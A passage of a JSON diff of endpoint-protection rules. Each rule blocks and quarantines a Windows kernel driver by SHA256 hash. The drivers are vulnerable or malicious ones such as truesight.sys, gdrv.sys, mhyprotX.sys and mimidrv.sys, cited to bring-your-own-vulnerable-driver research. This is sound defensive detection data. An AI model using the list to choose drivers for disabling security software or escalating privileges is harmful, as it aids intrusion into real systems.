"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157402Z", + "creation_date": "2026-03-23T11:45:31.157408Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157418Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d6ac74e0b2bdcdd56538498b01483b2ab2e724d82bebe095ff0ca57c51e3b14d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6bee408-bfbc-552a-9b4e-1c39a2715e9d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480940Z", + "creation_date": "2026-03-23T11:45:31.480944Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480961Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"9a56b25010995e6bd244bdf59ded80a62986701a1dbf91142148cb41038c7bcf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6c97a80-1704-5e68-9f14-875e260c4a8b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485547Z", + "creation_date": "2026-03-23T11:45:31.485550Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485560Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f641ac8749a0fa9c116f61f98061732416665dd6f5899ef3bbd0715a078e3d77", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6d8ee60-e5df-555a-968a-e09f9845202b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823130Z", + "creation_date": "2026-03-23T11:45:31.823133Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823141Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ceb24d0060383f34f6ef3a105df078b357e4119b3ff3739b33add0a2dcaad79", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6eb5188-1546-5914-873a-7aa767b10724", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609429Z", + "creation_date": "2026-03-23T11:45:29.609431Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b213524b22aadcc273142c4b8afc2a6219d6b8b7cab4b41adf9944efb8f46005", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6f33bfb-fc9e-51ce-a6da-dc0ddedec0c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979726Z", + "creation_date": "2026-03-23T11:45:29.979728Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979733Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40e0be2ed5d07d5ecf14232fe64a95c7ad6fd942a60b4a6e21fda69c75bbb78d", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6f3ed1b-b4c6-54ae-bd06-8a5238967a14", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470843Z", + "creation_date": "2026-03-23T11:45:30.470847Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470856Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "07f962d8b90f359cf12faa55772d0ef05237ac2fbb2ff7d5cff700df93643e65", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6fc5e61-96df-568d-bd08-5b457de13679", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608670Z", + "creation_date": "2026-03-23T11:45:29.608672Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608678Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8a7f08a0e8cdd52a35ad54a576dec8c1cd6a1ded6c28422f2e70ae8e8107fbb", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f6fe166b-04c4-5903-9bee-218f5182072f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807605Z", + "creation_date": "2026-03-23T11:45:31.807607Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807613Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b7dcaf3a048710fe192179f551090eb4c216b0fab5c208996e72baefcc2451e2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f700e3e0-2914-56e7-b9fe-55f1305e9f8e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159403Z", + "creation_date": "2026-03-23T11:45:31.159405Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159410Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "c6456b92b1f3dca09c62ce5e9e70d1b8cf82e426f5033b2cba384f6efd710a77", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f706fdea-0c4a-50a8-aa0d-079a6f84e16b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156143Z", + "creation_date": "2026-03-23T11:45:31.156145Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156150Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85db85f799171057ff4d736e68737b8a464da14c18f4d31e26c43051c3e67de1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f70920ea-9123-54a4-ae2b-900d951734b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473987Z", + "creation_date": "2026-03-23T11:45:31.473992Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474002Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bf960262b1ce57f1eaec06bde3c8d33425e6924b58e71d20634d5b74193a2c46", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7111408-3afd-5b15-90ea-2af16d4e75cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142766Z", + "creation_date": "2026-03-23T11:45:32.142768Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a32806139db1f02442679cc20c0ca4d30f91c6a42c6205d347cbc374779900d2", + "comment": "Vulnerable VirIT Agent System Driver (aka 
viragt64.sys) [https://www.trendmicro.com/en_no/research/24/a/kasseika-ransomware-deploys-byovd-attacks-abuses-psexec-and-expl.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f71e4d97-1a98-554b-9e59-cb89c0bf25e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968308Z", + "creation_date": "2026-03-23T11:45:29.968311Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968321Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "865e4bc7290fc3b380e266ccd98c2d4e965beb711d7efd090d052e8326accdd2", + "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7284bbd-6c40-5340-8a96-29300f7f912e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816673Z", + 
"creation_date": "2026-03-23T11:45:30.816675Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816680Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4eebf3fc1a508fe0e54c061a211c44a3df641707adab16ff839187759e8d2a61", + "comment": "Vulnerable Kernel Driver (aka avalueio.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f72dac8e-789e-56ee-87ec-8a90a2a7b6b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613048Z", + "creation_date": "2026-03-23T11:45:29.613049Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613055Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "03a831e18d933954d432187835e0d6aea8bf10fd84dfbe36a23366e2b0538a11", + "comment": "Hilscher cifX Device Driver abuse (aka Physmem.sys) [https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7352208-6d17-5fb8-87b2-1e9c6578d4d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981629Z", + "creation_date": "2026-03-23T11:45:29.981637Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981651Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "760be95d4c04b10df89a78414facf91c0961020e80561eee6e2cb94b43b76510", + "comment": "Vulnerable Kernel Driver (aka NetFlt.sys) [https://www.loldrivers.io/drivers/30d6c39c-1d93-4101-8dd3-322ff0ab7fb3/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f73a9795-7691-5323-8088-e99e9b7ecce5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611909Z", + "creation_date": "2026-03-23T11:45:29.611911Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.611916Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6e76764d750ebd835aa4bb055830d278df530303585614c1dc743f8d5adf97d7", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f73ef725-3459-5424-a40e-114532b5980d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816209Z", + "creation_date": "2026-03-23T11:45:30.816211Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816217Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85fdd255c5d7add25fd7cd502221387a5e11f02144753890218dd31a8333a1a3", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f73fda1c-1882-549b-93da-f893fa6ff5ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", 
+ "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816215Z", + "creation_date": "2026-03-23T11:45:31.816218Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816226Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "80c662a564bec8719db16eabcc3f601e3fbc6280d6682eccfed090a83300eb01", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7467f8c-b98e-55eb-a79f-b3ac5afbe25a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609369Z", + "creation_date": "2026-03-23T11:45:29.609373Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609380Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "9c0e80958b907c8df345ec2f8d711acefb4951ee3e6e84892ecd429f5e1f3acb", + "comment": "Vulnerable Kernel Driver (aka gdrv.sys) [https://www.loldrivers.io/drivers/2bea1bca-753c-4f09-bc9f-566ab0193f4a/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7469e7e-8004-5ef3-9144-c602f95efa0c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833699Z", + "creation_date": "2026-03-23T11:45:30.833702Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d41b6cbf58215cc6d6a0d452937aa0dd9ba73140f0ab1daa7a6f29afd4d6b4cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f74aa327-46cd-5889-bb2e-208ec759a77b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473542Z", + "creation_date": "2026-03-23T11:45:31.473546Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473556Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0c985671e0517054bb6fdf676c2e65a2bd0d5101564250268f7de5e716f4b81a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f74c1d60-a834-5c48-8329-3b73512e7c57", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828489Z", + "creation_date": "2026-03-23T11:45:30.828491Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828497Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5cd5b884ead3c1485bace633184e9c660d97f2d1e676c1ced82d5cfe33b3c213", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f7568d63-797c-5fe4-9037-12ebd43f6f46", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814123Z", + "creation_date": "2026-03-23T11:45:31.814127Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814134Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43c7147cb0998ef5ac62caf6996fabf9ab0ea0a465c85afd7fc744e8f8386f6a", + "comment": 